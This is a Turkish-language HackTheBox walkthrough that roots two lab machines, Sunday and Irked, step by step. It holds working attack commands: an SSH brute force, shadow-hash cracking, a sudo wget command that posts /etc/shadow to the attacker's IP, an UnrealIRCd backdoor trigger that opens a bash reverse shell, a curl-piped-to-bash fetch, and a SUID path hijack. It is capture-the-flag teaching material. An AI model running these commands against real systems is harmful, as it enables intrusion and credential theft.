HackTheBox Günlükleri 2 | 2 Unix Machines Walkthrough TR
HackTheBox yazı serisine Unix makinelerden devam etmek istedim. Ikinci yazıda yine birbirinden farklı 2Unix makineyi çözümleyeceğiz;
- Sunday
- Irked
1.Sunday
Ilk olarak makine de yüzeysel Nmap Script ve Versiyon taraması yapalım;
nmap -sC -sV -oA bashed 10.10.10.76
79 ve 111 Portları açık, bunları cebe atıp bu kez full port taraması yapalım;
nmap -p- 10.10.10.76
Bu seferde unknown olarak 22022, 35342, 56272 bulduk. Şimdi elde ettiğimiz portlar özelinde tarama atalım;
nmap -sC -sV -p 79,111,2202,35342,56272 10.10.10.76
Finger’da Sun Solaris Fingerd olduğunu gördük. Finger Enumeration için python script’i çalıştıralım;
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76 |less -S
pts/3'de sunny çıktı. Birde root özelinde bakalım;
./finger-user-enum.pl -u root -t 10.10.10.76
Ve evet! pts/3 için sundat çıktı birde. Şimdi 22022'e sunny kullanıcısıyla ssh yaparak sunday pass’ini deneyelim;
ssh sunny@10.10.10.76 -p 22022
Ya da;
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022
Ve bağlandık! Olurda finger enum etmeseydik ve brute force yapmak isteseydik;
patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/probable-v2-top1575.txt persistent=0 ignore:fgrep=’failed.’
Şimdi sudo yetkisiyle sunny’nin çalıştırabildiği process’lere bakalım;
“ sudo -l “ ile kontrol ettiğimizde;
Şifresiz olarak /root/troll ile kullanabileceğimizi söylüyor. Bizde;
sudo /root/troll
geçtik. Ve Klasörleri gezmeye başladık. Burda / dizinin altında /backup bulduk. Incelediğimizde;
ls -la
cat shadow.backup
Sammy ve Sunny’nin hash’lerini bulduk. Şimdi kırmaya çalısalım ssh kracken ile bunun için sammy’nin hash’ini “ kir “ diye bir dosya oluşturup içine atalim ve hashcat te bu hash tipii bulalım;
Bulduk 7400! Şimdi kıralım;
./hashcat -m 7400 kir /opt/wordlist/rockyou.txt
Şimdi bulduğumuz cooldude! şifresiyle;
sudo sammy
geçtik. Şimdi sudo yetkisiyle sammy’nin çalıştırabildiği process’lere bakalım;
Wget ile root yetkisinde çalışabildiğimizden Wget ile shadow’u çekelim;
nc -lvp 80
sudo /usr/bin/wget — post-file=/etc/shadow 10.10.14.23
Ardından root ile sammy’nin hashini değiştirelim ve üstüne yazalım;
sudo /usr/bin/wget 10.10.14.6/shadow -O /etc/shadow
Yada yine root’un hash’ini kir2 olarak bi dosyaya atıp;
./hashcat -m 7400 kir2 /opt/wordlist/rockyou.txt
Kırıp Root olabiliriz!
2. Irked
Ilk olarak makine de yüzeysel Nmap Script ve Versiyon taraması yapalım;
nmap -sC -sV -oA bashed 10.10.10.117
22, 80 ve 111 açık gözüküyor.
Birde tüm portlara bakalım. Burda 8067'i bulduk.
Bizde bu UnrealIRC için zafiyetlere bakalım;
searchsploit Unreal
Şimdi bu zafiyetlerden backdoor’un Non-Msf’siz halini araştıralım;
Burda karşımıza çıkan makaledeki exploit’i trigger edelim;
Bunun ilk için ilk terminale dinleyici açalım;
ncat -lvnp 9001
Ikinci terminale trigger komutunu girelim;
echo “AB; bash -c ‘bash -i >& /dev/tcp/10.10.14.3/9001 0>&1’” |ncat 10.10.10.117 8067
Ve shell aldık!
Ilk olarak python shell yükleyelim;
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Peşine dizinleri araştıralım. Burda dikkatimizi ircd klasörü çekti. Ondan bash_history dosyasına bakalım;
cat .bash_history | less
Burda dikkatimizi home/djmardov çekti, klasöre gidince elle tutulur bişey yok. Içerideki dosya ve klasörleri listeleyelince;
. -ls
Dikkatimizi /home/djmardov/Documents içinde .backup çekti. Inceleyince içinde bir key bulduk!
Bunu not alalım. Peşine WEb’e bakınca bir resim çıktı.
Bu resmi stenografi edelim;
curl http://10.10.10.117/irked.jpg -o irked.jpg
steghide extract -sf irked.jpg
Şifre sordu. Bulduğumuz key’i deneyelim;
steghide extract -sf irked.jpg -p <backup’daki kelime>
Ve pass.txt çıktısı verdi! Şifreyi alıp djmardov ile ssh yapalım;
ssh djmardov@10.10.10.117
Ve giriş yaptık!
Dizinleri kontrol edince bir şey bulamadık. Ondan LinEnum atalım;
python -m SimpleHTTPServer 80
Sonra bu shell’i çekelim;
curl 10.10.14.23:8000/LinEnum.sh | bash
Ama çalıştırınca ilk başta birşey bulamasakta dikkatimizi viewuser çekti;
Inceleyince baktık ki viewuser “ /tm/listusers” ı çalıştırıyormuş. O nedenle bizde listuser’ı editleyelim;
nano /tmp/listusers
İçerisine;
#!/bin/bash
/bin/bash
Ardından yetki verip viewuser’ı çalıştıralım;
chmod +x /tmp/listusers
viewuser
Çağırınca shell geldi!
